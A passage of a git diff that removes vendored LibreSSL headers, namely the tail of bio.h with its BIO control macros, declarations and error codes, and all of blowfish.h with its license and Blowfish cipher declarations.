-	int shutdown;
-	int flags;	/* extra storage */
-	int retry_reason;
-	int num;
-	void *ptr;
-	struct bio_st *next_bio;	/* used by filter BIOs */
-	struct bio_st *prev_bio;	/* used by filter BIOs */
-	int references;
-	unsigned long num_read;
-	unsigned long num_write;
-
-	CRYPTO_EX_DATA ex_data;
-};
-
-DECLARE_STACK_OF(BIO)
-
-typedef struct bio_f_buffer_ctx_struct {
-	/* Buffers are setup like this:
-	 *
-	 * <---------------------- size ----------------------->
-	 * +---------------------------------------------------+
-	 * | consumed | remaining          | free space        |
-	 * +---------------------------------------------------+
-	 * <-- off --><------- len ------->
-	 */
-
-	/* BIO *bio; */ /* this is now in the BIO struct */
-	int ibuf_size;	/* how big is the input buffer */
-	int obuf_size;	/* how big is the output buffer */
-
-	char *ibuf;	/* the char array */
-	int ibuf_len;	/* how many bytes are in it */
-	int ibuf_off;	/* write/read offset */
-
-	char *obuf;	/* the char array */
-	int obuf_len;	/* how many bytes are in it */
-	int obuf_off;	/* write/read offset */
-} BIO_F_BUFFER_CTX;
-
-/* Prefix and suffix callback in ASN1 BIO */
-typedef int asn1_ps_func(BIO *b, unsigned char **pbuf, int *plen, void *parg);
-
-
-/* connect BIO stuff */
-#define BIO_CONN_S_BEFORE		1
-#define BIO_CONN_S_GET_IP		2
-#define BIO_CONN_S_GET_PORT		3
-#define BIO_CONN_S_CREATE_SOCKET	4
-#define BIO_CONN_S_CONNECT		5
-#define BIO_CONN_S_OK			6
-#define BIO_CONN_S_BLOCKED_CONNECT	7
-#define BIO_CONN_S_NBIO			8
-/*#define BIO_CONN_get_param_hostname	BIO_ctrl */
-
-#define BIO_C_SET_CONNECT			100
-#define BIO_C_DO_STATE_MACHINE			101
-#define BIO_C_SET_NBIO				102
-#define BIO_C_SET_PROXY_PARAM			103
-#define BIO_C_SET_FD				104
-#define BIO_C_GET_FD				105
-#define BIO_C_SET_FILE_PTR			106
-#define BIO_C_GET_FILE_PTR			107
-#define BIO_C_SET_FILENAME			108
-#define BIO_C_SET_SSL				109
-#define BIO_C_GET_SSL				110
-#define BIO_C_SET_MD				111
-#define BIO_C_GET_MD				112
-#define BIO_C_GET_CIPHER_STATUS			113
-#define BIO_C_SET_BUF_MEM			114
-#define BIO_C_GET_BUF_MEM_PTR			115
-#define BIO_C_GET_BUFF_NUM_LINES		116
-#define BIO_C_SET_BUFF_SIZE			117
-#define BIO_C_SET_ACCEPT			118
-#define BIO_C_SSL_MODE				119
-#define BIO_C_GET_MD_CTX			120
-#define BIO_C_GET_PROXY_PARAM			121
-#define BIO_C_SET_BUFF_READ_DATA		122 /* data to read first */
-#define BIO_C_GET_CONNECT			123
-#define BIO_C_GET_ACCEPT			124
-#define BIO_C_SET_SSL_RENEGOTIATE_BYTES		125
-#define BIO_C_GET_SSL_NUM_RENEGOTIATES		126
-#define BIO_C_SET_SSL_RENEGOTIATE_TIMEOUT	127
-#define BIO_C_FILE_SEEK				128
-#define BIO_C_GET_CIPHER_CTX			129
-#define BIO_C_SET_BUF_MEM_EOF_RETURN		130/*return end of input value*/
-#define BIO_C_SET_BIND_MODE			131
-#define BIO_C_GET_BIND_MODE			132
-#define BIO_C_FILE_TELL				133
-#define BIO_C_GET_SOCKS				134
-#define BIO_C_SET_SOCKS				135
-
-#define BIO_C_SET_WRITE_BUF_SIZE		136/* for BIO_s_bio */
-#define BIO_C_GET_WRITE_BUF_SIZE		137
-#define BIO_C_MAKE_BIO_PAIR			138
-#define BIO_C_DESTROY_BIO_PAIR			139
-#define BIO_C_GET_WRITE_GUARANTEE		140
-#define BIO_C_GET_READ_REQUEST			141
-#define BIO_C_SHUTDOWN_WR			142
-#define BIO_C_NREAD0				143
-#define BIO_C_NREAD				144
-#define BIO_C_NWRITE0				145
-#define BIO_C_NWRITE				146
-#define BIO_C_RESET_READ_REQUEST		147
-#define BIO_C_SET_MD_CTX			148
-
-#define BIO_C_SET_PREFIX			149
-#define BIO_C_GET_PREFIX			150
-#define BIO_C_SET_SUFFIX			151
-#define BIO_C_GET_SUFFIX			152
-
-#define BIO_C_SET_EX_ARG			153
-#define BIO_C_GET_EX_ARG			154
-
-#define BIO_set_app_data(s,arg)		BIO_set_ex_data(s,0,arg)
-#define BIO_get_app_data(s)		BIO_get_ex_data(s,0)
-
-/* BIO_s_connect() and BIO_s_socks4a_connect() */
-#define BIO_set_conn_hostname(b,name) BIO_ctrl(b,BIO_C_SET_CONNECT,0,(char *)name)
-#define BIO_set_conn_port(b,port) BIO_ctrl(b,BIO_C_SET_CONNECT,1,(char *)port)
-#define BIO_set_conn_ip(b,ip)	  BIO_ctrl(b,BIO_C_SET_CONNECT,2,(char *)ip)
-#define BIO_set_conn_int_port(b,port) BIO_ctrl(b,BIO_C_SET_CONNECT,3,(char *)port)
-#define BIO_get_conn_hostname(b)  BIO_ptr_ctrl(b,BIO_C_GET_CONNECT,0)
-#define BIO_get_conn_port(b)      BIO_ptr_ctrl(b,BIO_C_GET_CONNECT,1)
-#define BIO_get_conn_ip(b) 		 BIO_ptr_ctrl(b,BIO_C_GET_CONNECT,2)
-#define BIO_get_conn_int_port(b) BIO_int_ctrl(b,BIO_C_GET_CONNECT,3,0)
-
-
-#define BIO_set_nbio(b,n)	BIO_ctrl(b,BIO_C_SET_NBIO,(n),NULL)
-
-/* BIO_s_accept_socket() */
-#define BIO_set_accept_port(b,name) BIO_ctrl(b,BIO_C_SET_ACCEPT,0,(char *)name)
-#define BIO_get_accept_port(b)	BIO_ptr_ctrl(b,BIO_C_GET_ACCEPT,0)
-/* #define BIO_set_nbio(b,n)	BIO_ctrl(b,BIO_C_SET_NBIO,(n),NULL) */
-#define BIO_set_nbio_accept(b,n) BIO_ctrl(b,BIO_C_SET_ACCEPT,1,(n)?(void *)"a":NULL)
-#define BIO_set_accept_bios(b,bio) BIO_ctrl(b,BIO_C_SET_ACCEPT,2,(char *)bio)
-
-#define BIO_BIND_NORMAL			0
-#define BIO_BIND_REUSEADDR_IF_UNUSED	1
-#define BIO_BIND_REUSEADDR		2
-#define BIO_set_bind_mode(b,mode) BIO_ctrl(b,BIO_C_SET_BIND_MODE,mode,NULL)
-#define BIO_get_bind_mode(b,mode) BIO_ctrl(b,BIO_C_GET_BIND_MODE,0,NULL)
-
-#define BIO_do_connect(b)	BIO_do_handshake(b)
-#define BIO_do_accept(b)	BIO_do_handshake(b)
-#define BIO_do_handshake(b)	BIO_ctrl(b,BIO_C_DO_STATE_MACHINE,0,NULL)
-
-/* BIO_s_proxy_client() */
-#define BIO_set_url(b,url)	BIO_ctrl(b,BIO_C_SET_PROXY_PARAM,0,(char *)(url))
-#define BIO_set_proxies(b,p)	BIO_ctrl(b,BIO_C_SET_PROXY_PARAM,1,(char *)(p))
-/* BIO_set_nbio(b,n) */
-#define BIO_set_filter_bio(b,s) BIO_ctrl(b,BIO_C_SET_PROXY_PARAM,2,(char *)(s))
-/* BIO *BIO_get_filter_bio(BIO *bio); */
-#define BIO_set_proxy_cb(b,cb) BIO_callback_ctrl(b,BIO_C_SET_PROXY_PARAM,3,(void *(*cb)()))
-#define BIO_set_proxy_header(b,sk) BIO_ctrl(b,BIO_C_SET_PROXY_PARAM,4,(char *)sk)
-#define BIO_set_no_connect_return(b,bool) BIO_int_ctrl(b,BIO_C_SET_PROXY_PARAM,5,bool)
-
-#define BIO_get_proxy_header(b,skp) BIO_ctrl(b,BIO_C_GET_PROXY_PARAM,0,(char *)skp)
-#define BIO_get_proxies(b,pxy_p) BIO_ctrl(b,BIO_C_GET_PROXY_PARAM,1,(char *)(pxy_p))
-#define BIO_get_url(b,url)	BIO_ctrl(b,BIO_C_GET_PROXY_PARAM,2,(char *)(url))
-#define BIO_get_no_connect_return(b)	BIO_ctrl(b,BIO_C_GET_PROXY_PARAM,5,NULL)
-
-#define BIO_set_fd(b,fd,c)	BIO_int_ctrl(b,BIO_C_SET_FD,c,fd)
-#define BIO_get_fd(b,c)		BIO_ctrl(b,BIO_C_GET_FD,0,(char *)c)
-
-#define BIO_set_fp(b,fp,c)	BIO_ctrl(b,BIO_C_SET_FILE_PTR,c,(char *)fp)
-#define BIO_get_fp(b,fpp)	BIO_ctrl(b,BIO_C_GET_FILE_PTR,0,(char *)fpp)
-
-#define BIO_seek(b,ofs)	(int)BIO_ctrl(b,BIO_C_FILE_SEEK,ofs,NULL)
-#define BIO_tell(b)	(int)BIO_ctrl(b,BIO_C_FILE_TELL,0,NULL)
-
-/* name is cast to lose const, but might be better to route through a function
-   so we can do it safely */
-#define BIO_read_filename(b,name) BIO_ctrl(b,BIO_C_SET_FILENAME, \
-		BIO_CLOSE|BIO_FP_READ,(char *)name)
-#define BIO_write_filename(b,name) BIO_ctrl(b,BIO_C_SET_FILENAME, \
-		BIO_CLOSE|BIO_FP_WRITE,name)
-#define BIO_append_filename(b,name) BIO_ctrl(b,BIO_C_SET_FILENAME, \
-		BIO_CLOSE|BIO_FP_APPEND,name)
-#define BIO_rw_filename(b,name) BIO_ctrl(b,BIO_C_SET_FILENAME, \
-		BIO_CLOSE|BIO_FP_READ|BIO_FP_WRITE,name)
-
-/* WARNING WARNING, this ups the reference count on the read bio of the
- * SSL structure.  This is because the ssl read BIO is now pointed to by
- * the next_bio field in the bio.  So when you free the BIO, make sure
- * you are doing a BIO_free_all() to catch the underlying BIO. */
-#define BIO_set_ssl(b,ssl,c)	BIO_ctrl(b,BIO_C_SET_SSL,c,(char *)ssl)
-#define BIO_get_ssl(b,sslp)	BIO_ctrl(b,BIO_C_GET_SSL,0,(char *)sslp)
-#define BIO_set_ssl_mode(b,client)	BIO_ctrl(b,BIO_C_SSL_MODE,client,NULL)
-#define BIO_set_ssl_renegotiate_bytes(b,num) \
-	BIO_ctrl(b,BIO_C_SET_SSL_RENEGOTIATE_BYTES,num,NULL)
-#define BIO_get_num_renegotiates(b) \
-	BIO_ctrl(b,BIO_C_GET_SSL_NUM_RENEGOTIATES,0,NULL)
-#define BIO_set_ssl_renegotiate_timeout(b,seconds) \
-	BIO_ctrl(b,BIO_C_SET_SSL_RENEGOTIATE_TIMEOUT,seconds,NULL)
-
-/* defined in evp.h */
-/* #define BIO_set_md(b,md)	BIO_ctrl(b,BIO_C_SET_MD,1,(char *)md) */
-
-#define BIO_get_mem_data(b,pp)	BIO_ctrl(b,BIO_CTRL_INFO,0,(char *)pp)
-#define BIO_set_mem_buf(b,bm,c)	BIO_ctrl(b,BIO_C_SET_BUF_MEM,c,(char *)bm)
-#define BIO_get_mem_ptr(b,pp)	BIO_ctrl(b,BIO_C_GET_BUF_MEM_PTR,0,(char *)pp)
-#define BIO_set_mem_eof_return(b,v) \
-				BIO_ctrl(b,BIO_C_SET_BUF_MEM_EOF_RETURN,v,NULL)
-
-/* For the BIO_f_buffer() type */
-#define BIO_get_buffer_num_lines(b)	BIO_ctrl(b,BIO_C_GET_BUFF_NUM_LINES,0,NULL)
-#define BIO_set_buffer_size(b,size)	BIO_ctrl(b,BIO_C_SET_BUFF_SIZE,size,NULL)
-#define BIO_set_read_buffer_size(b,size) BIO_int_ctrl(b,BIO_C_SET_BUFF_SIZE,size,0)
-#define BIO_set_write_buffer_size(b,size) BIO_int_ctrl(b,BIO_C_SET_BUFF_SIZE,size,1)
-#define BIO_set_buffer_read_data(b,buf,num) BIO_ctrl(b,BIO_C_SET_BUFF_READ_DATA,num,buf)
-
-/* Don't use the next one unless you know what you are doing :-) */
-#define BIO_dup_state(b,ret)	BIO_ctrl(b,BIO_CTRL_DUP,0,(char *)(ret))
-
-#define BIO_reset(b)		(int)BIO_ctrl(b,BIO_CTRL_RESET,0,NULL)
-#define BIO_eof(b)		(int)BIO_ctrl(b,BIO_CTRL_EOF,0,NULL)
-#define BIO_set_close(b,c)	(int)BIO_ctrl(b,BIO_CTRL_SET_CLOSE,(c),NULL)
-#define BIO_get_close(b)	(int)BIO_ctrl(b,BIO_CTRL_GET_CLOSE,0,NULL)
-#define BIO_pending(b)		(int)BIO_ctrl(b,BIO_CTRL_PENDING,0,NULL)
-#define BIO_wpending(b)		(int)BIO_ctrl(b,BIO_CTRL_WPENDING,0,NULL)
-/* ...pending macros have inappropriate return type */
-size_t BIO_ctrl_pending(BIO *b);
-size_t BIO_ctrl_wpending(BIO *b);
-#define BIO_flush(b)		(int)BIO_ctrl(b,BIO_CTRL_FLUSH,0,NULL)
-#define BIO_get_info_callback(b,cbp) (int)BIO_ctrl(b,BIO_CTRL_GET_CALLBACK,0, \
-						   cbp)
-#define BIO_set_info_callback(b,cb) (int)BIO_callback_ctrl(b,BIO_CTRL_SET_CALLBACK,cb)
-
-/* For the BIO_f_buffer() type */
-#define BIO_buffer_get_num_lines(b) BIO_ctrl(b,BIO_CTRL_GET,0,NULL)
-
-/* For BIO_s_bio() */
-#define BIO_set_write_buf_size(b,size) (int)BIO_ctrl(b,BIO_C_SET_WRITE_BUF_SIZE,size,NULL)
-#define BIO_get_write_buf_size(b,size) (size_t)BIO_ctrl(b,BIO_C_GET_WRITE_BUF_SIZE,size,NULL)
-#define BIO_make_bio_pair(b1,b2)   (int)BIO_ctrl(b1,BIO_C_MAKE_BIO_PAIR,0,b2)
-#define BIO_destroy_bio_pair(b)    (int)BIO_ctrl(b,BIO_C_DESTROY_BIO_PAIR,0,NULL)
-#define BIO_shutdown_wr(b) (int)BIO_ctrl(b, BIO_C_SHUTDOWN_WR, 0, NULL)
-/* macros with inappropriate type -- but ...pending macros use int too: */
-#define BIO_get_write_guarantee(b) (int)BIO_ctrl(b,BIO_C_GET_WRITE_GUARANTEE,0,NULL)
-#define BIO_get_read_request(b)    (int)BIO_ctrl(b,BIO_C_GET_READ_REQUEST,0,NULL)
-size_t BIO_ctrl_get_write_guarantee(BIO *b);
-size_t BIO_ctrl_get_read_request(BIO *b);
-int BIO_ctrl_reset_read_request(BIO *b);
-
-/* ctrl macros for dgram */
-#define BIO_ctrl_dgram_connect(b,peer)  \
-                     (int)BIO_ctrl(b,BIO_CTRL_DGRAM_CONNECT,0, (char *)peer)
-#define BIO_ctrl_set_connected(b, state, peer) \
-         (int)BIO_ctrl(b, BIO_CTRL_DGRAM_SET_CONNECTED, state, (char *)peer)
-#define BIO_dgram_recv_timedout(b) \
-         (int)BIO_ctrl(b, BIO_CTRL_DGRAM_GET_RECV_TIMER_EXP, 0, NULL)
-#define BIO_dgram_send_timedout(b) \
-         (int)BIO_ctrl(b, BIO_CTRL_DGRAM_GET_SEND_TIMER_EXP, 0, NULL)
-#define BIO_dgram_get_peer(b,peer) \
-         (int)BIO_ctrl(b, BIO_CTRL_DGRAM_GET_PEER, 0, (char *)peer)
-#define BIO_dgram_set_peer(b,peer) \
-         (int)BIO_ctrl(b, BIO_CTRL_DGRAM_SET_PEER, 0, (char *)peer)
-
-/* These two aren't currently implemented */
-/* int BIO_get_ex_num(BIO *bio); */
-/* void BIO_set_ex_free_func(BIO *bio,int idx,void (*cb)()); */
-int BIO_set_ex_data(BIO *bio, int idx, void *data);
-void *BIO_get_ex_data(BIO *bio, int idx);
-int
-BIO_get_ex_new_index(long argl, void *argp, CRYPTO_EX_new *new_func,
-CRYPTO_EX_dup *dup_func, CRYPTO_EX_free *free_func);
-unsigned long BIO_number_read(BIO *bio);
-unsigned long BIO_number_written(BIO *bio);
-
-/* For BIO_f_asn1() */
-int
-BIO_asn1_set_prefix(BIO *b, asn1_ps_func *prefix,
-asn1_ps_func *prefix_free);
-int
-BIO_asn1_get_prefix(BIO *b, asn1_ps_func **pprefix,
-asn1_ps_func **pprefix_free);
-int
-BIO_asn1_set_suffix(BIO *b, asn1_ps_func *suffix,
-asn1_ps_func *suffix_free);
-int
-BIO_asn1_get_suffix(BIO *b, asn1_ps_func **psuffix,
-asn1_ps_func **psuffix_free);
-
-BIO_METHOD *BIO_s_file(void );
-BIO *BIO_new_file(const char *filename, const char *mode);
-BIO *BIO_new_fp(FILE *stream, int close_flag);
-# define BIO_s_file_internal	BIO_s_file
-BIO *	BIO_new(BIO_METHOD *type);
-int	BIO_set(BIO *a, BIO_METHOD *type);
-int	BIO_free(BIO *a);
-void	BIO_vfree(BIO *a);
-int	BIO_read(BIO *b, void *data, int len)
-		__attribute__((__bounded__(__buffer__,2,3)));
-int	BIO_gets(BIO *bp, char *buf, int size)
-		__attribute__((__bounded__ (__string__,2,3)));
-int	BIO_write(BIO *b, const void *data, int len)
-		__attribute__((__bounded__(__buffer__,2,3)));
-int	BIO_puts(BIO *bp, const char *buf);
-int	BIO_indent(BIO *b, int indent, int max);
-long	BIO_ctrl(BIO *bp, int cmd, long larg, void *parg);
-long	BIO_callback_ctrl(BIO *b, int cmd,
-	    void (*fp)(struct bio_st *, int, const char *, int, long, long));
-char *	BIO_ptr_ctrl(BIO *bp, int cmd, long larg);
-long	BIO_int_ctrl(BIO *bp, int cmd, long larg, int iarg);
-BIO *	BIO_push(BIO *b, BIO *append);
-BIO *	BIO_pop(BIO *b);
-void	BIO_free_all(BIO *a);
-BIO *	BIO_find_type(BIO *b, int bio_type);
-BIO *	BIO_next(BIO *b);
-BIO *	BIO_get_retry_BIO(BIO *bio, int *reason);
-int	BIO_get_retry_reason(BIO *bio);
-BIO *	BIO_dup_chain(BIO *in);
-
-int BIO_nread0(BIO *bio, char **buf);
-int BIO_nread(BIO *bio, char **buf, int num);
-int BIO_nwrite0(BIO *bio, char **buf);
-int BIO_nwrite(BIO *bio, char **buf, int num);
-
-long BIO_debug_callback(BIO *bio, int cmd, const char *argp, int argi,
-    long argl, long ret);
-
-BIO_METHOD *BIO_s_mem(void);
-BIO *BIO_new_mem_buf(void *buf, int len);
-BIO_METHOD *BIO_s_socket(void);
-BIO_METHOD *BIO_s_connect(void);
-BIO_METHOD *BIO_s_accept(void);
-BIO_METHOD *BIO_s_fd(void);
-BIO_METHOD *BIO_s_log(void);
-BIO_METHOD *BIO_s_bio(void);
-BIO_METHOD *BIO_s_null(void);
-BIO_METHOD *BIO_f_null(void);
-BIO_METHOD *BIO_f_buffer(void);
-BIO_METHOD *BIO_f_nbio_test(void);
-#ifndef OPENSSL_NO_DGRAM
-BIO_METHOD *BIO_s_datagram(void);
-#endif
-
-/* BIO_METHOD *BIO_f_ber(void); */
-
-int BIO_sock_should_retry(int i);
-int BIO_sock_non_fatal_error(int _error);
-int BIO_dgram_non_fatal_error(int _error);
-
-int BIO_fd_should_retry(int i);
-int BIO_fd_non_fatal_error(int _error);
-int
-BIO_dump_cb(int (*cb)(const void *data, size_t len, void *u),
-void *u, const char *s, int len);
-int
-BIO_dump_indent_cb(int (*cb)(const void *data, size_t len, void *u),
-void *u, const char *s, int len, int indent);
-int BIO_dump(BIO *b, const char *bytes, int len);
-int BIO_dump_indent(BIO *b, const char *bytes, int len, int indent);
-int BIO_dump_fp(FILE *fp, const char *s, int len);
-int BIO_dump_indent_fp(FILE *fp, const char *s, int len, int indent);
-struct hostent *BIO_gethostbyname(const char *name);
-/* We might want a thread-safe interface too:
- * struct hostent *BIO_gethostbyname_r(const char *name,
- *     struct hostent *result, void *buffer, size_t buflen);
- * or something similar (caller allocates a struct hostent,
- * pointed to by "result", and additional buffer space for the various
- * substructures; if the buffer does not suffice, NULL is returned
- * and an appropriate error code is set).
- */
-int BIO_sock_error(int sock);
-int BIO_socket_ioctl(int fd, long type, void *arg);
-int BIO_socket_nbio(int fd, int mode);
-int BIO_get_port(const char *str, unsigned short *port_ptr);
-int BIO_get_host_ip(const char *str, unsigned char *ip);
-int BIO_get_accept_socket(char *host_port, int mode);
-int BIO_accept(int sock, char **ip_port);
-int BIO_sock_init(void );
-void BIO_sock_cleanup(void);
-int BIO_set_tcp_ndelay(int sock, int turn_on);
-
-BIO *BIO_new_socket(int sock, int close_flag);
-BIO *BIO_new_dgram(int fd, int close_flag);
-BIO *BIO_new_fd(int fd, int close_flag);
-BIO *BIO_new_connect(char *host_port);
-BIO *BIO_new_accept(char *host_port);
-
-int
-BIO_new_bio_pair(BIO **bio1, size_t writebuf1,
-BIO **bio2, size_t writebuf2);
-/* If successful, returns 1 and in *bio1, *bio2 two BIO pair endpoints.
- * Otherwise returns 0 and sets *bio1 and *bio2 to NULL.
- * Size 0 uses default value.
- */
-
-void BIO_copy_next_retry(BIO *b);
-
-/*long BIO_ghbn_ctrl(int cmd,int iarg,char *parg);*/
-
-#ifdef __MINGW_PRINTF_FORMAT
-int
-BIO_printf(BIO *bio, const char *format, ...)
-	__attribute__((__format__(__MINGW_PRINTF_FORMAT, 2, 3), __nonnull__(2)));
-int
-BIO_vprintf(BIO *bio, const char *format, va_list args)
-	__attribute__((__format__(__MINGW_PRINTF_FORMAT, 2, 0), __nonnull__(2)));
-int
-BIO_snprintf(char *buf, size_t n, const char *format, ...)
-	__attribute__((__deprecated__, __format__(__MINGW_PRINTF_FORMAT, 3, 4),
-	    __nonnull__(3)));
-int
-BIO_vsnprintf(char *buf, size_t n, const char *format, va_list args)
-	__attribute__((__deprecated__, __format__(__MINGW_PRINTF_FORMAT, 3, 0),
-	    __nonnull__(3)));
-#else
-int
-BIO_printf(BIO *bio, const char *format, ...)
-	__attribute__((__format__(__printf__, 2, 3), __nonnull__(2)));
-int
-BIO_vprintf(BIO *bio, const char *format, va_list args)
-	__attribute__((__format__(__printf__, 2, 0), __nonnull__(2)));
-int
-BIO_snprintf(char *buf, size_t n, const char *format, ...)
-	__attribute__((__deprecated__, __format__(__printf__, 3, 4),
-	    __nonnull__(3)));
-int
-BIO_vsnprintf(char *buf, size_t n, const char *format, va_list args)
-	__attribute__((__deprecated__, __format__(__printf__, 3, 0),
-	    __nonnull__(3)));
-#endif
-
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_BIO_strings(void);
-
-/* Error codes for the BIO functions. */
-
-/* Function codes. */
-#define BIO_F_ACPT_STATE				 100
-#define BIO_F_BIO_ACCEPT				 101
-#define BIO_F_BIO_BER_GET_HEADER			 102
-#define BIO_F_BIO_CALLBACK_CTRL				 131
-#define BIO_F_BIO_CTRL					 103
-#define BIO_F_BIO_GETHOSTBYNAME				 120
-#define BIO_F_BIO_GETS					 104
-#define BIO_F_BIO_GET_ACCEPT_SOCKET			 105
-#define BIO_F_BIO_GET_HOST_IP				 106
-#define BIO_F_BIO_GET_PORT				 107
-#define BIO_F_BIO_MAKE_PAIR				 121
-#define BIO_F_BIO_NEW					 108
-#define BIO_F_BIO_NEW_FILE				 109
-#define BIO_F_BIO_NEW_MEM_BUF				 126
-#define BIO_F_BIO_NREAD					 123
-#define BIO_F_BIO_NREAD0				 124
-#define BIO_F_BIO_NWRITE				 125
-#define BIO_F_BIO_NWRITE0				 122
-#define BIO_F_BIO_PUTS					 110
-#define BIO_F_BIO_READ					 111
-#define BIO_F_BIO_SOCK_INIT				 112
-#define BIO_F_BIO_WRITE					 113
-#define BIO_F_BUFFER_CTRL				 114
-#define BIO_F_CONN_CTRL					 127
-#define BIO_F_CONN_STATE				 115
-#define BIO_F_DGRAM_SCTP_READ				 132
-#define BIO_F_FILE_CTRL					 116
-#define BIO_F_FILE_READ					 130
-#define BIO_F_LINEBUFFER_CTRL				 129
-#define BIO_F_MEM_READ					 128
-#define BIO_F_MEM_WRITE					 117
-#define BIO_F_SSL_NEW					 118
-#define BIO_F_WSASTARTUP				 119
-
-/* Reason codes. */
-#define BIO_R_ACCEPT_ERROR				 100
-#define BIO_R_BAD_FOPEN_MODE				 101
-#define BIO_R_BAD_HOSTNAME_LOOKUP			 102
-#define BIO_R_BROKEN_PIPE				 124
-#define BIO_R_CONNECT_ERROR				 103
-#define BIO_R_EOF_ON_MEMORY_BIO				 127
-#define BIO_R_ERROR_SETTING_NBIO			 104
-#define BIO_R_ERROR_SETTING_NBIO_ON_ACCEPTED_SOCKET	 105
-#define BIO_R_ERROR_SETTING_NBIO_ON_ACCEPT_SOCKET	 106
-#define BIO_R_GETHOSTBYNAME_ADDR_IS_NOT_AF_INET		 107
-#define BIO_R_INVALID_ARGUMENT				 125
-#define BIO_R_INVALID_IP_ADDRESS			 108
-#define BIO_R_INVALID_PORT_NUMBER			 129
-#define BIO_R_IN_USE					 123
-#define BIO_R_KEEPALIVE					 109
-#define BIO_R_NBIO_CONNECT_ERROR			 110
-#define BIO_R_NO_ACCEPT_PORT_SPECIFIED			 111
-#define BIO_R_NO_HOSTNAME_SPECIFIED			 112
-#define BIO_R_NO_PORT_DEFINED				 113
-#define BIO_R_NO_PORT_SPECIFIED				 114
-#define BIO_R_NO_SUCH_FILE				 128
-#define BIO_R_NULL_PARAMETER				 115
-#define BIO_R_TAG_MISMATCH				 116
-#define BIO_R_UNABLE_TO_BIND_SOCKET			 117
-#define BIO_R_UNABLE_TO_CREATE_SOCKET			 118
-#define BIO_R_UNABLE_TO_LISTEN_SOCKET			 119
-#define BIO_R_UNINITIALIZED				 120
-#define BIO_R_UNSUPPORTED_METHOD			 121
-#define BIO_R_WRITE_TO_READ_ONLY_BIO			 126
-#define BIO_R_WSASTARTUP				 122
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/blowfish.h b/thirdparty/libressl/include/openssl/blowfish.h
deleted file mode 100644
index 4d2db80..0000000
--- a/thirdparty/libressl/include/openssl/blowfish.h
+++ /dev/null
@@ -1,112 +0,0 @@
-/* $OpenBSD: blowfish.h,v 1.14 2014/07/10 09:01:04 miod Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- * 
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- * 
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- * 
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from 
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- * 
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- * 
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#ifndef HEADER_BLOWFISH_H
-#define HEADER_BLOWFISH_H
-
-#include <openssl/opensslconf.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-#ifdef OPENSSL_NO_BF
-#error BF is disabled.
-#endif
-
-#define BF_ENCRYPT	1
-#define BF_DECRYPT	0
-
-/*
- * !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- * ! BF_LONG has to be at least 32 bits wide. If it's wider, then !
- * ! BF_LONG_LOG2 has to be defined along.                        !
- * !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- */
-
-#define BF_LONG unsigned int
-
-#define BF_ROUNDS	16
-#define BF_BLOCK	8
-
-typedef struct bf_key_st
-	{
-	BF_LONG P[BF_ROUNDS+2];
-	BF_LONG S[4*256];
-	} BF_KEY;
-
-void BF_set_key(BF_KEY *key, int len, const unsigned char *data);
-
-void BF_encrypt(BF_LONG *data,const BF_KEY *key);
-void BF_decrypt(BF_LONG *data,const BF_KEY *key);
-
-void BF_ecb_encrypt(const unsigned char *in, unsigned char *out,
-	const BF_KEY *key, int enc);
-void BF_cbc_encrypt(const unsigned char *in, unsigned char *out, long length,
-	const BF_KEY *schedule, unsigned char *ivec, int enc);
-void BF_cfb64_encrypt(const unsigned char *in, unsigned char *out, long length,
-	const BF_KEY *schedule, unsigned char *ivec, int *num, int enc);
-void BF_ofb64_encrypt(const unsigned char *in, unsigned char *out, long length,
-	const BF_KEY *schedule, unsigned char *ivec, int *num);
